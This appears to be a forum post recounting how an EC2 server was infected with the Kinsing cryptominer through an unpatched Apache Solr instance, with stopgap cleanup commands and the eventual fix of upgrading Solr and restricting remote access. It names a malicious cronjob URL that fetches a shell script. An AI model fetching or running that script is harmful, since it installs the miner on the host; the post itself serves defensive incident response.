I came to know about the my ec2-instance infected when I found the CPU uses goes to 99%. There are two malicious processes(kinsing,kdevtmpfsi) running when I run command:
top (check 100% CPU.jpeg)
ps -aux
I have gone through the bunch of links and try out lot of different things from different websites. The most of them share the temporary solutions.
I have found the temporary solutions from: redis/docker-library-redis#217
Kinsing create 3 files at /var/tmp and /tmp directory. So if we change the content of the files and change the permission of it will work for the some period of time.
There is cronjob which is like "http://195.3.146.118/s.sh", if so then remove it.
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
echo "everything is good here" > /tmp/kdevtmpfsi
echo "everything is good here" > /var/tmp/kinsing
echo "everything is good here" > /tmp/zzz
sudo chown -R root:root /tmp/kdevtmpfsi
sudo chown -R root:root /tmp/zzz
sudo chown -R root:root /var/tmp/kinsing
But the issue with the above solution is that if you monitor for the some time the virus will come again with some different folder and files. Even one of my server, it don't allow me to SSH login.
It was frustrating time to figure out that from where it enter. If we know the entery gate then we surely close it to solve perminantly. There are some people say that it enter from Docker open API port. But Docker was not installed in my instance so that isn't the case.
Then after with lot of research and article analyse I found that it may possible because of the patch issue of Open source software. This is one going to real kick for me as it direct my thought in right direction. It help me to figure out that kinsing store .sh file in the system through the open source software glith and exec it's code on our server.
If you are using phpmailer older version then there are some vulnerability which might allow to Remote Code Execution (RCE) in your system.
https://www.cvedetails.com/cve/CVE-2016-10045/
But in my case I have the latest phpmailer, so again this will not be the case.
Yes, there are lot of vulnerabilities regarding solr which allow them to enter in the system and play with data.
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-18263/Apache-Solr.html
I have the solr 6.6.5 and there is "Exec Code" vulnerability which click in mind to see the solr log (/solr/server/solr/logs) file. Here I found what I'm looking for. Kinsing send the entire .sh file in search through the search on 8983 port and then exec it. So it will update my crontab files and create all the malicious process.
Solution: First, I have updated my solr to the latest version 8.5.1 which is the more secure with removed the existing vulnerability.
Second, It offer SOLR_IP_WHITELIST (https://lucene.apache.org/solr/guide/8_5/solr-upgrade-notes.html) security, so set this variable such that it will forbidden to remote access.
This will help me to resolve issue.